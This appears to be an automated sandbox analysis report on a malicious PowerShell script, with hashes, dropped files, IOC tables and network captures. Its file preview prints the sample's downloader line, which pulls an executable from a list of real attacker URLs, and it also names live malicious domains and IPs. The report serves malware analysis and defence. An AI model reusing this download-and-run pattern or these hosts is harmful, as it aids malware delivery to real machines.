    Classification: mal96.expl.evad.winPS1@7/14@6/2
    EGA Information:
    • Successful, ratio: 100%
    HCA Information:
    • Successful, ratio: 100%
    • Number of executed functions: 5
    • Number of non-executed functions: 1
    Cookbook Comments:
    • Found application associated with file extension: .ps1
    • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
    • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
    • Not all processes where analyzed, report is missing behavior information
    • Report size exceeded maximum capacity and may have missing behavior information.
    • Report size getting too big, too many NtCreateKey calls found.
    • Report size getting too big, too many NtQueryAttributesFile calls found.
    • Report size getting too big, too many NtSetInformationFile calls found.
    • VT rate limit hit for: ps1001.ps1
                                               Time | Type | Description
                                               03:27:48 | API Interceptor | 9009x Sleep call for process: powershell.exe modified
                                               Match | Associated Sample Name / URL | Detection | Threat Name | Context
                                               198.185.159.145 | ps1008.ps1 | malicious | Unknown | bemnyc.com/u8erijeq
                                               198.185.159.145 | ps1006.ps1 | malicious | Unknown | bemnyc.com/u8erijeq
                                               198.185.159.145 | ps1005.ps1 | malicious | Unknown | bemnyc.com/u8erijeq
                                               198.185.159.145 | Purchase Order #5315262WNH72901-The Sanford Company.pdf | malicious | Unknown | aircormech.com/
                                               198.185.159.145 | firmware.armv7l.elf | malicious | Unknown | 198.185.159.145/
                                               198.185.159.145 | firmware.i586.elf | malicious | Unknown | 198.185.159.145/
                                               198.185.159.145 | eqqjbbjMlt.elf | malicious | Unknown | uwemusic.com/
                                               198.185.159.145 | FXja4SyAYs.exe | malicious | Unknown | familycompany.net/index.php
                                               198.185.159.145 | FXja4SyAYs.exe | malicious | Unknown | familycompany.net/index.php
                                               198.185.159.145 | SecuriteInfo.com.Exploit.CVE-2018-0798.4.23906.18593.rtf | malicious | FormBook | www.wvpbuildingservices.com/bi09/?TJ=j0G4c8K0K&Czrt=lZMivCAdWjEad0YwZ6gLnX1BXgPIjGJJhnqogY0KbyoDqo2C47LZ+Q1xf2o08ygL02QL6A==
                                               162.43.104.133 | ps1008.ps1 | malicious | Unknown | eastend.jp/bl5kfa
                                               162.43.104.133 | ps1006.ps1 | malicious | Unknown | eastend.jp/bl5kfa
                                               162.43.104.133 | ps1005.ps1 | malicious | Unknown | eastend.jp/bl5kfa
                                               Match | Associated Sample Name / URL | Detection | Threat Name | Context
                                               eastend.jp | ps1008.ps1 | malicious | Unknown | 162.43.104.133
                                               eastend.jp | ps1006.ps1 | malicious | Unknown | 162.43.104.133
                                               eastend.jp | ps1005.ps1 | malicious | Unknown | 162.43.104.133
                                               bemnyc.com | ps1008.ps1 | malicious | Unknown | 198.185.159.145
                                               bemnyc.com | ps1006.ps1 | malicious | Unknown | 198.185.159.145
                                               bemnyc.com | ps1005.ps1 | malicious | Unknown | 198.185.159.145
                                               bemnyc.com | pdf.ps1 | malicious | Unknown | 198.185.159.145
                                               Match | Associated Sample Name / URL | Detection | Threat Name | Context
                                               CYBERTRAILSUS | ps1008.ps1 | malicious | Unknown | 162.43.104.133
                                               CYBERTRAILSUS | ps1006.ps1 | malicious | Unknown | 162.43.104.133
                                               CYBERTRAILSUS | ps1005.ps1 | malicious | Unknown | 162.43.104.133
                                               CYBERTRAILSUS | IWnUKXop2x.elf | malicious | Mirai, Okiru | 162.43.182.68
                                               CYBERTRAILSUS | la.bot.mipsel.elf | malicious | Unknown | 162.43.62.102
                                               CYBERTRAILSUS | 25XrVZw56S.exe | malicious | Unknown | 162.43.112.11
                                               CYBERTRAILSUS | oUc5lyEzJy.exe | malicious | Unknown | 162.43.112.11
                                               CYBERTRAILSUS | JUHGSyleu7.exe | malicious | Unknown | 162.43.112.11
                                               CYBERTRAILSUS | oUc5lyEzJy.exe | malicious | Unknown | 162.43.112.11
                                               CYBERTRAILSUS | JUHGSyleu7.exe | malicious | Unknown | 162.43.112.11
                                               SQUARESPACEUS | ps1008.ps1 | malicious | Unknown | 198.185.159.145
                                               SQUARESPACEUS | ps1006.ps1 | malicious | Unknown | 198.185.159.145
                                               SQUARESPACEUS | ps1005.ps1 | malicious | Unknown | 198.185.159.145
                                               SQUARESPACEUS | https://link.edgepilot.com/s/62feea16/mgkISLmjmE63UVzPYgooJQ?u=https://ameely.com.eg/ | malicious | Unknown | 198.185.159.145
                                               SQUARESPACEUS | https://sawfish-groundhog-d6h6.squarespace.com/ | malicious | Unknown | 198.185.159.177
                                               SQUARESPACEUS | original.eml | malicious | Unknown | 198.185.159.144
                                               SQUARESPACEUS | https://www.canva.com/design/DAGV5ZsI2aM/Y4DbzinsvfGp5Ll4c_oJJQ/view?utm_content=DAGV5ZsI2aM&utm_campaign=designshare&utm_medium=link&utm_source=editor | malicious | Unknown | 198.185.159.177
                                               SQUARESPACEUS | https://www.canva.com/design/DAGVsvWsNbI/iZzU0BNPZvRGZSXgumDARw/view?utm_content=DAGVsvWsNbI&utm_campaign=designshare&utm_medium=link&utm_source=editor | malicious | Unknown | 198.185.159.177
                                               SQUARESPACEUS | http://heptagon-olive-l8hr.squarespace.com | malicious | Unknown | 198.185.159.177
                                               SQUARESPACEUS | botnet.x86.elf | malicious | Mirai, Moobot | 142.202.19.72
                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):61147
                                              Entropy (8bit):5.0779483220981145
                                              Encrypted:false
                                              SSDEEP:1536:DA1+z307j1bV3CNBQkj2Uh4iUxqaVLflJnPvlOSHaqdxJfSb7OdBYNPzqtAHkwN7:01+z30n1bV3CNBQkj2UqiUqaVLflJnPI
                                              MD5:A76FC79CC71F2C9A6023862053AC8DAA
                                              SHA1:F44A5893A9D2288B73C827F1853940EBEACDB9DF
                                              SHA-256:F798F95B18AE3C02C1741996B103531626B0F9E980DD2177DB80B8C45B539DC7
                                              SHA-512:F4EA42545E59C742F0AD00D3D4DF4726527365E20B7A5BEA212B2B1722D6E13ED9DF34326A3326352F44711F28C57FCFAF7443BB6B375725B33A641E717AA871
                                              Malicious:false
                                              Reputation:low
                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):64
                                              Entropy (8bit):1.1940658735648508
                                              Encrypted:false
                                              SSDEEP:3:NlllulxmH/lZ:NllUg
                                              MD5:D904BDD752B6F23D81E93ECA3BD8E0F3
                                              SHA1:026D8B0D0F79861746760B0431AD46BAD2A01676
                                              SHA-256:B393D3CEC8368794972E4ADD978B455A2F5BD37E3A116264DBED14DC8C67D6F2
                                              SHA-512:5B862B7F0BCCEF48E6A5A270C3F6271D7A5002465EAF347C6A266365F1B2CD3D88144C043D826D3456AA43484124D619BF16F9AEAB1F706463F553EE24CB5740
                                              Malicious:false
                                              Reputation:moderate, very likely benign file
                                              Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                              File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x48e, 9 symbols, created Fri Nov 22 10:23:37 2024, 1st section name ".debug$S"
                                              Category:dropped
                                              Size (bytes):1332
                                              Entropy (8bit):4.009916244691291
                                              Encrypted:false
                                              SSDEEP:24:H+sFzW91rBdTIH8wKRmNII+ycuZhNvakSxPNnqS2d:yBdTIjKRmu1ulva3DqSG
                                              MD5:77C06A4494756855CB53F94CC3C14687
                                              SHA1:4773E573A538C3F6BC6BC718B50F4AC7D73352F9
                                              SHA-256:06F1D5EACED518619698BC1505C56E0C76665C926152A9877185C12146B1E27D
                                              SHA-512:E7644F7D12631793AFD41A5E581D70B50586FF7F2A1DD4FCDC94EC89A9A86BBF3F0A950F6215493983BE7EBD4BDED6CFD9B3F1D9B914E1ADAA5D839ECD861BED
                                              Malicious:false
                                              Reputation:low
                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:ASCII text, with no line terminators
                                              Category:dropped
                                              Size (bytes):60
                                              Entropy (8bit):4.038920595031593
                                              Encrypted:false
                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                              Malicious:false
                                              Reputation:high, very likely benign file
                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:ASCII text, with no line terminators
                                              Category:dropped
                                              Size (bytes):60
                                              Entropy (8bit):4.038920595031593
                                              Encrypted:false
                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                              Malicious:false
                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                              Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                              File Type:MSVC .res
                                              Category:dropped
                                              Size (bytes):652
                                              Entropy (8bit):3.1029857567356935
                                              Encrypted:false
                                              SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryAGak7YnqqxXPN5Dlq5J:+RI+ycuZhNvakSxPNnqX
                                              MD5:629D4247C0A5344E31838587A88EED32
                                              SHA1:1E07FC3F0886A1A0CEFCC62406F6C7C6C942E18C
                                              SHA-256:0B48B3C362D896A541E84340B99F6DE1C91D1341F4CD7DD8B4D4B0F2EB4D408F
                                              SHA-512:1285F00C7E3055DDA7DA5D6653A5B3F2836C52DBA08C783503FA0F823A4233AF3F0DB3AAE4B8340E4E3DD816B993C98838D93808445F26F436EABFDC04CAB0FC
                                              Malicious:false
                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (1032), with no line terminators
                                              Category:dropped
                                              Size (bytes):1035
                                              Entropy (8bit):4.369231230362479
                                              Encrypted:false
                                              SSDEEP:24:JVPHMxi73UnaDa+anvOq89NWEMF90A7Q/:JVPHMxi73fa++1UNWEpf
                                              MD5:5989018A4C0AD9CC8BC4CC1E5524186C
                                              SHA1:EC9217244192C5EC96B4AC67982AC05983036569
                                              SHA-256:F2C563322C4D6A4C8B00946B48E3A59B45D8EC5991D977ACD4514960F8FAB4E5
                                              SHA-512:2550FB415B2022E3E3D14BE551310C7C6821D8B1AF7854253D8701F5376D720E1F661C0177F24B0F3BFEDF90469064C107D72B1DCAC6EFA355C24DC6AA786975
                                              Malicious:false
                                               Preview:using System;using System.Diagnostics;using System.Runtime.InteropServices;[StructLayout(LayoutKind.Sequential)]public struct l1Ill1{public IntPtr llI1Il1111;public IntPtr ll11llII111;public uint II11IIIIIIl;public uint Il1lI1;}[StructLayout(LayoutKind.Sequential,CharSet=CharSet.Unicode)]public struct l1lll1l{public uint II1l1Il1II;public string I11l1111I;public string lllIIlII;public string l1I1IIllI1I1;public uint I1I1ll11I;public uint lIlII11;public uint II11lIIl11I;public uint lIl1lIl1II11;public uint lIIl1Il;public uint Illl11I1;public uint II1ll1l11;public uint IlIlIl1Illl;public short l11111lI1l;public short lllIllI11I11;public IntPtr I1II1lIII;public IntPtr Il11lI1;public IntPtr ll1IlI;public IntPtr l1l11Il1lll1;};public static class lIlIlI{[DllImport("kernel32.dll",SetLastError=true)]public static extern bool CreateProcess(string llllIIIllIlI,string l1111I1I11I1,IntPtr ll1Il111,IntPtr IIIll11Il1,bool l1Il1lll111,uint IIlIl11l11l,IntPtr Il1I1Il11l1l,string l1l1Illl,ref l1lll
                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (368), with no line terminators
                                              Category:dropped
                                              Size (bytes):371
                                              Entropy (8bit):5.245978274073425
                                              Encrypted:false
                                              SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2CHhJ23fJbTekGzxs7+AEszICHhJ23fJbTekb:p37Lvkmb6KiBNGWZEvBNbn
                                              MD5:E549796D1345E2C16EBC01BC6C79C3DA
                                              SHA1:6EDBB0641D21AC79CCE6D1AB5D906E50767074DF
                                              SHA-256:76552C23D188D9D1B0C5524C5E2235FB52C8D3D5B26E6C3DB6F6F8E966A7ABBF
                                              SHA-512:619C336D8CDA348288A6C8942A1D1CAF8917A53A739A1CF2CACC32D449084297E9DCC53D808CD55979E9DCD1458528C0C89310143AE9D5CF4F940CE6C33FE2B5
                                              Malicious:true
                                               Preview:/t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\dakef3hk\dakef3hk.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\dakef3hk\dakef3hk.0.cs"
                                              Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                              Category:dropped
                                              Size (bytes):4096
                                              Entropy (8bit):2.9934897920946817
                                              Encrypted:false
                                              SSDEEP:48:6p+xOMHQ+7mlodY+w4IGjKsxg5D5P2oU7WhjJK2eW1ulva3Dq:5fQ+7mlyY+w47KCKooIcNg9K
                                              MD5:DEB68662AD35899D1E2C1EEFA84CFE0E
                                              SHA1:F5B238E8C64BB4111BAA093085616B391D6EAA4F
                                              SHA-256:B56E56720FEEFE8EE07F5FD86F7281961891B99A4F905451223F3D858E517062
                                              SHA-512:B5222ABADF02CF495CBA3FD4358C1DE935AA9B853828CFE9FDDA1ABA0E0D29DAE946839B949EC9612D1C1E556359FA4BA3B71B53D52CDA4D8F6F376090622814
                                              Malicious:false
                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (451), with CRLF, CR line terminators
                                              Category:modified
                                              Size (bytes):872
                                              Entropy (8bit):5.310544965075116
                                              Encrypted:false
                                              SSDEEP:24:KOId3ka6KiBNXEvBNbuKax5DqBVKVrdFAMBJTH:xkka6LBhEvBduK2DcVKdBJj
                                              MD5:6736BB705E2E3824696481640224212A
                                              SHA1:4470BEC2887B29144E3B9CC52A00F098F46E9F07
                                              SHA-256:EA27264ED6660C71B856DECA832772401E9D568127FE8769BA2009071DCBC9CD
                                              SHA-512:CB8B6266D2991600870BE8D65D7BA3D4694A1DA0ECC66752EEAC3D5099152DE3DACCE645D90C0BB892C003D71A4E5F4036125CDE2BE41778121852F2502AB37B
                                              Malicious:false
                                               Preview:
                                               C:\Users\user\Desktop> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\dakef3hk\dakef3hk.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\dakef3hk\dakef3hk.0.cs"
                                               Microsoft (R) Visual C# Compiler version 4.8.4084.0
                                               for C# 5
                                               Copyright (C) Microsoft Corporation. All rights reserved.
                                               This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240
                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):6222
                                              Entropy (8bit):3.7124798944453925
                                              Encrypted:false
                                              SSDEEP:96:pRKqCKP8tkvhkvCCt53gOYoahHDegOYoaiHDU:pRKEPS53gOzmegOz7U
                                              MD5:EEB519AF466377D546D03374F4E4AB42
                                              SHA1:E547CFF5186D96B41767C71DB582389A6986F567
                                              SHA-256:1F28D323BD98E7F324C706D25D793EB400825FAC96BC172618C514919FC2B51F
                                              SHA-512:2D22E0A22B965F71F9A8FBD1CA1AAB70E382150573B18A6AF9A3B58A4E66B124FA1C820928EE53465D04D5D445B0E488F7E4045569D05C67A76AB4173CE9A232
                                              Malicious:false
                                              File type:ASCII text, with very long lines (64682), with CRLF, LF line terminators
                                              Entropy (8bit):5.710219694700802
                                              TrID:
                                                File name:ps1001.ps1
                                                File size:804'722 bytes
                                                MD5:5996b2aa1d6b234a48ed62f1ecaae159
                                                SHA1:4f6e56e34d7da66cb1f9b9ebc707f7fd01764352
                                                SHA256:100a4c16630356774d7ebee6681d40279fcb4ceabccf194d371af739ca98ce53
                                                SHA512:6d74c8bd7f52fedf55068a58cca93ce30582517a40d556b07c3f3ec3d5f17283b2cc7852601331bd77d1a3fd8f09b2f3cc6ebd7a2c6fa8a34cee45363eb80d0f
                                                SSDEEP:12288:8ppYXT60Mv5a8kebcetZ3Aq74GA19Td1JplTmu5jP+D/43EeI1gZEtd14Q2f3Nug:fXWZ5Pbcq92zjP+sjI10+r4Q21ug
                                                TLSH:000523108B2C9D9F0AFC5678446A1F4F12FDCEC82484ECFAD294795F2E9EF394246658
                                                File Content Preview:$qzi=new-object net.webclient;$mrs='http://habarimoto24.com/nh@http://fenett2018.com/dobgx@http://eastend.jp/bl5kfa@http://bemnyc.com/u8erijeq@http://abakus-biuro.net//a9zqemm'.split('@');$wai = '509';$kqz=$env:public+'\'+$wai+'.exe';foreach($cme in $mrs)
                                                Icon Hash:3270d6baae77db44
                                                Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                Nov 22, 2024 09:27:50.733648062 CET | 49704 | 80 | 192.168.2.8 | 162.43.104.133
                                                Nov 22, 2024 09:27:50.853300095 CET | 80 | 49704 | 162.43.104.133 | 192.168.2.8
                                                Nov 22, 2024 09:27:50.853487015 CET | 49704 | 80 | 192.168.2.8 | 162.43.104.133
                                                Nov 22, 2024 09:27:50.854479074 CET | 49704 | 80 | 192.168.2.8 | 162.43.104.133
                                                Nov 22, 2024 09:27:50.974134922 CET | 80 | 49704 | 162.43.104.133 | 192.168.2.8
                                                Nov 22, 2024 09:27:52.323499918 CET | 80 | 49704 | 162.43.104.133 | 192.168.2.8
                                                Nov 22, 2024 09:27:52.323522091 CET | 80 | 49704 | 162.43.104.133 | 192.168.2.8
                                                Nov 22, 2024 09:27:52.323534966 CET | 80 | 49704 | 162.43.104.133 | 192.168.2.8
                                                Nov 22, 2024 09:27:52.323731899 CET | 49704 | 80 | 192.168.2.8 | 162.43.104.133
                                                Nov 22, 2024 09:27:52.473551035 CET | 49705 | 80 | 192.168.2.8 | 198.185.159.145
                                                Nov 22, 2024 09:27:52.593065977 CET | 80 | 49705 | 198.185.159.145 | 192.168.2.8
                                                Nov 22, 2024 09:27:52.593185902 CET | 49705 | 80 | 192.168.2.8 | 198.185.159.145
                                                Nov 22, 2024 09:27:52.593318939 CET | 49705 | 80 | 192.168.2.8 | 198.185.159.145
                                                Nov 22, 2024 09:27:52.712846994 CET | 80 | 49705 | 198.185.159.145 | 192.168.2.8
                                                Nov 22, 2024 09:27:53.691771984 CET | 80 | 49705 | 198.185.159.145 | 192.168.2.8
                                                Nov 22, 2024 09:27:53.691807985 CET | 80 | 49705 | 198.185.159.145 | 192.168.2.8
                                                Nov 22, 2024 09:27:53.691863060 CET | 49705 | 80 | 192.168.2.8 | 198.185.159.145
                                                Nov 22, 2024 09:28:00.337393045 CET | 49704 | 80 | 192.168.2.8 | 162.43.104.133
                                                Nov 22, 2024 09:28:00.337466002 CET | 49705 | 80 | 192.168.2.8 | 198.185.159.145
                                                Nov 22, 2024 09:28:00.457313061 CET | 80 | 49704 | 162.43.104.133 | 192.168.2.8
                                                Nov 22, 2024 09:28:00.457803011 CET | 80 | 49705 | 198.185.159.145 | 192.168.2.8
                                                Nov 22, 2024 09:28:00.457896948 CET | 49704 | 80 | 192.168.2.8 | 162.43.104.133
                                                Nov 22, 2024 09:28:00.461260080 CET | 49705 | 80 | 192.168.2.8 | 198.185.159.145
                                                Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                Nov 22, 2024 09:27:49.264837027 CET | 64152 | 53 | 192.168.2.8 | 1.1.1.1
                                                Nov 22, 2024 09:27:50.241478920 CET | 53 | 64152 | 1.1.1.1 | 192.168.2.8
                                                Nov 22, 2024 09:27:50.429930925 CET | 58314 | 53 | 192.168.2.8 | 1.1.1.1
                                                Nov 22, 2024 09:27:50.572686911 CET | 53 | 58314 | 1.1.1.1 | 192.168.2.8
                                                Nov 22, 2024 09:27:50.583877087 CET | 60440 | 53 | 192.168.2.8 | 1.1.1.1
                                                Nov 22, 2024 09:27:50.725601912 CET | 53 | 60440 | 1.1.1.1 | 192.168.2.8
                                                Nov 22, 2024 09:27:52.332421064 CET | 57870 | 53 | 192.168.2.8 | 1.1.1.1
                                                Nov 22, 2024 09:27:52.472224951 CET | 53 | 57870 | 1.1.1.1 | 192.168.2.8
                                                Nov 22, 2024 09:27:53.693840027 CET | 61650 | 53 | 192.168.2.8 | 1.1.1.1
                                                Nov 22, 2024 09:27:53.834863901 CET | 53 | 61650 | 1.1.1.1 | 192.168.2.8
                                                Nov 22, 2024 09:28:00.337373972 CET | 53728 | 53 | 192.168.2.8 | 1.1.1.1
                                                Nov 22, 2024 09:28:00.477123976 CET | 53 | 53728 | 1.1.1.1 | 192.168.2.8
                                                Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
                                                Nov 22, 2024 09:27:49.264837027 CET | 192.168.2.8 | 1.1.1.1 | 0xa217 | Standard query (0) | habarimoto24.com | A (IP address) | IN (0x0001) | false
                                                Nov 22, 2024 09:27:50.429930925 CET | 192.168.2.8 | 1.1.1.1 | 0x41ba | Standard query (0) | fenett2018.com | A (IP address) | IN (0x0001) | false
                                                Nov 22, 2024 09:27:50.583877087 CET | 192.168.2.8 | 1.1.1.1 | 0x5bfc | Standard query (0) | eastend.jp | A (IP address) | IN (0x0001) | false
                                                Nov 22, 2024 09:27:52.332421064 CET | 192.168.2.8 | 1.1.1.1 | 0x20b | Standard query (0) | bemnyc.com | A (IP address) | IN (0x0001) | false
                                                Nov 22, 2024 09:27:53.693840027 CET | 192.168.2.8 | 1.1.1.1 | 0x4021 | Standard query (0) | abakus-biuro.net | A (IP address) | IN (0x0001) | false
                                                Nov 22, 2024 09:28:00.337373972 CET | 192.168.2.8 | 1.1.1.1 | 0x2c35 | Standard query (0) | yourmother4cancer.info | A (IP address) | IN (0x0001) | false
                                                Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                                                Nov 22, 2024 09:27:50.241478920 CET | 1.1.1.1 | 192.168.2.8 | 0xa217 | Server failure (2) | habarimoto24.com | none | none | A (IP address) | IN (0x0001) | false
                                                Nov 22, 2024 09:27:50.572686911 CET | 1.1.1.1 | 192.168.2.8 | 0x41ba | Name error (3) | fenett2018.com | none | none | A (IP address) | IN (0x0001) | false
                                                Nov 22, 2024 09:27:50.725601912 CET | 1.1.1.1 | 192.168.2.8 | 0x5bfc | No error (0) | eastend.jp | | 162.43.104.133 | A (IP address) | IN (0x0001) | false
                                                Nov 22, 2024 09:27:52.472224951 CET | 1.1.1.1 | 192.168.2.8 | 0x20b | No error (0) | bemnyc.com | | 198.185.159.145 | A (IP address) | IN (0x0001) | false
                                                Nov 22, 2024 09:27:52.472224951 CET | 1.1.1.1 | 192.168.2.8 | 0x20b | No error (0) | bemnyc.com | | 198.49.23.144 | A (IP address) | IN (0x0001) | false
                                                Nov 22, 2024 09:27:52.472224951 CET | 1.1.1.1 | 192.168.2.8 | 0x20b | No error (0) | bemnyc.com | | 198.49.23.145 | A (IP address) | IN (0x0001) | false
                                                Nov 22, 2024 09:27:52.472224951 CET | 1.1.1.1 | 192.168.2.8 | 0x20b | No error (0) | bemnyc.com | | 198.185.159.144 | A (IP address) | IN (0x0001) | false
                                                Nov 22, 2024 09:27:53.834863901 CET | 1.1.1.1 | 192.168.2.8 | 0x4021 | Name error (3) | abakus-biuro.net | none | none | A (IP address) | IN (0x0001) | false
                                                Nov 22, 2024 09:28:00.477123976 CET | 1.1.1.1 | 192.168.2.8 | 0x2c35 | Name error (3) | yourmother4cancer.info | none | none | A (IP address) | IN (0x0001) | false
                                                • eastend.jp
                                                • bemnyc.com
                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                0 | 192.168.2.8 | 49704 | 162.43.104.133 | 80 | 4640 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                Timestamp | Bytes transferred | Direction | Data
                                                Nov 22, 2024 09:27:50.854479074 CET | 66 | OUT | GET /bl5kfa HTTP/1.1
                                                Host: eastend.jp
                                                Connection: Keep-Alive
                                                Nov 22, 2024 09:27:52.323499918 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                Server: nginx
                                                Date: Fri, 22 Nov 2024 08:27:52 GMT
                                                Content-Type: text/html
                                                Content-Length: 2814
                                                Connection: keep-alive
                                                Vary: Accept-Encoding
                                                Last-Modified: Tue, 25 Jul 2023 10:28:06 GMT
                                                ETag: "afe-6014d2fcf5ab8"
                                                Data Ascii: <!DOCTYPE html><html lang="ja"><head><meta charset="EUC-JP" /><title>404 File Not Found</title><meta name="copyright" content="Copyright XSERVER Inc."><meta name="robots" content="INDEX,FOLLOW" /><meta name="viewport" content="width=device-width,initial-scale=1.0,minimum-scale=1.0"><style type="text/css">* { margin: 0; padding: 0;}img { border: 0;}ul { padding-left: 2em;}html { overflow-y: scroll; background: #3b79b7;}body { font-family: "", Meiryo, " ", "MS PGothic", " Pro W3", "Hiragino Kaku Gothic Pro", sans-serif; margin: 0; line-height: 1.4; font-size: 75%; text-align: center; color: white;}h1 { font-size: 24px; font-weight: bold;}h1 { font-weight: bold; line-height: 1; padding-bottom: 20px; font-family: Helvetica, sans-serif;}h2 { text-align: center; font-weight: bold; font-size: 27px;}p { text-align: center; font-size: 14
                                                Nov 22, 2024 09:27:52.323522091 CET | 1236 | IN | Data Ascii: px; margin: 0; padding: 0; color: white;}.explain { border-top: 1px solid #fff; border-bottom: 1px solid #fff; line-height: 1.5; margin: 30px auto; padding: 17px;}#cause { text-align: left;}#cause li {
                                                Nov 22, 2024 09:27:52.323534966 CET | 587 | IN | Data Ascii: dy><div id="base"> <h1><span>404</span><br /> File Not Found</h1> <h2></h2> <p class="explain"></p> <h3>


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                1 | 192.168.2.8 | 49705 | 198.185.159.145 | 80 | 4640 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                Timestamp | Bytes transferred | Direction | Data
                                                Nov 22, 2024 09:27:52.593318939 CET | 68 | OUT | GET /u8erijeq HTTP/1.1
                                                Host: bemnyc.com
                                                Connection: Keep-Alive
                                                Nov 22, 2024 09:27:53.691771984 CET | 1236 | IN | HTTP/1.1 400 Bad Request
                                                Cache-Control: no-cache, must-revalidate
                                                Content-Length: 2061
                                                Content-Type: text/html; charset=UTF-8
                                                Date: Fri, 22 Nov 2024 08:27:53 UTC
                                                Expires: Thu, 01 Jan 1970 00:00:00 UTC
                                                Pragma: no-cache
                                                Server: Squarespace
                                                X-Contextid: NGvXrWLg/0U7RAisU
                                                Data Ascii: <!DOCTYPE html><head> <title>400 Bad Request</title> <meta name="viewport" content="width=device-width, initial-scale=1"> <style type="text/css"> body { background: white; } main { position: absolute; top: 50%; left: 50%; transform: translate(-50%, -50%); text-align: center; min-width: 95vw; } main h1 { font-weight: 400; font-size: 4.6em; color: #191919; margin: 0 0 11px 0; } main p { font-size: 1.4em; color: #3a3a3a; font-weight: 400; line-height: 2em; margin: 0; } main p a { color: #3a3a3a; text-decoration: none; border-bottom: solid 1px #3a3a3a; } body { font-family: "Helvetica Neue", Helvetica, Arial, sans-serif; font-size: 12px; } #status-page { display: none; } footer { position: absolute; bottom: 22px; left: 0; width: 100%; text-align: center; line-height: 2em; } footer span {
                                                Nov 22, 2024 09:27:53.691807985 CET | 1105 | IN | Data Ascii: margin: 0 11px; font-size: 1em; font-weight: 400; color: #a9a9a9; white-space: nowrap; } footer span strong { font-weight: 400; color: #191919; } @media (max-width: 600px) { body { font-family: "



                                                Target ID:1
                                                Start time:03:27:45
                                                Start date:22/11/2024
                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                Wow64 process (32bit):false
                                                Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\ps1001.ps1"
                                                Imagebase:0x7ff6cb6b0000
                                                File size:452'608 bytes
                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                Target ID:2
                                                Start time:03:27:45
                                                Start date:22/11/2024
